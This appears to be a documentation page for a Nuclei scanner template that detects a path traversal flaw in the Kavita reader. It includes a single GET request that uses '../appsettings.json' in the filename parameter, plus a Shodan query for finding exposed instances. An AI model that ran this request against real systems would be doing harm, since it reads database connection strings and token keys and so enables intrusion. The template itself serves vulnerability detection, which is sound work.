Skip to content

Kavita - Local File Inclusion

ID: kavita-lfi

Severity: high

Author: arafatansari

Tags: kavita,lfi,huntr

Kavita - Path Traversal is vulnerable to local file inclusion via abusing the Path Traversal filename parameter of the /api/image/cover-upload.

id: kavita-lfi
info:
name: Kavita - Local File Inclusion
author: arafatansari
severity: high
description: |
Kavita - Path Traversal is vulnerable to local file inclusion via abusing the Path Traversal filename parameter of the /api/image/cover-upload.
reference:
- https://huntr.dev/bounties/2eef332b-65d2-4f13-8c39-44a8771a6f18/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
cpe: cpe:2.3:a:kavitareader:kavita:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: http.html:"kavita"
product: kavita
vendor: kavitareader
tags: kavita,lfi,huntr
http:
- method: GET
path:
- '{{BaseURL}}/api/image/cover-upload?filename=../appsettings.json'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"ConnectionStrings":'
- '"Path":'
- '"TokenKey":'
condition: and
- type: status
status:
- 200
# digest: 490a0046304402203e3493567a618d8fa24d53a9c0229d4bfe6c85ed0e90c8a73d61cae145725095022062e427aee8ceba2881d8b25aa1977402cdebe84764bcfe9fb1a70aa9189f897e:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/other/kavita-lfi.yaml"

View on Github